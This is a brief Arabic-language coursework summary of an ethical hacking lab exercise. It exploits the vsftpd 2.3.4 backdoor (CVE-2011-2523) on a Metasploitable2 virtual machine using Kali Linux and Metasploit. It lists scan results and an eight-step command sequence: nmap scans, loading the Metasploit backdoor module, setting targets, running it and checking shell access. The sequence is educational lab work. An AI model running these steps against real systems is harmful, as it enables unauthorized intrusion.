
تقييم الاختراق الأخلاقي | اختبار عملي للثغرة في الباب الخلفي لـ vsftpd 2.3.4 (CVE-2011-2523) على Metasploitable2 باستخدام Kali Linux و Metasploit
الوحدة: - اختراق أخلاقي الجامعة: جامعة لندن متروبوليتان البرنامج: بكالوريوس علوم (مع مرتبة الشرف) في الأمن السيبراني وعلوم الطب الشرعي
تم إجراء جميع الأنشطة في مختبر افتراضي معزول وخاضع للتحكم لأغراض تعليمية فقط. لم يتم استهداف أي أنظمة في العالم الحقيقي. يتوافق كل العمل مع قانون إساءة استخدام الحاسوب لعام 1990.
المنفذ 21/tcp - vsftpd 2.3.4 (الهدف) المنفذ 22/tcp - OpenSSH 4.7p1 المنفذ 23/tcp - Linux telnetd المنفذ 80/tcp - Apache httpd 2.2.8 المنفذ 139/tcp - Samba smbd 3.X المنفذ 445/tcp - Samba smbd 3.X المنفذ 3306/tcp - MySQL 5.0.51a المنفذ 6667/tcp - UnrealIRCd
الخطوة 1: nmap -sn 192.168.56.0/24 الخطوة 2: nmap -sV 192.168.56.103 الخطوة 3: msfconsole الخطوة 4: use exploit/unix/ftp/vsftpd_234_backdoor الخطوة 5: set RHOSTS 192.168.56.103 الخطوة 6: set LHOST 192.168.56.1 الخطوة 7: run الخطوة 8: id && whoami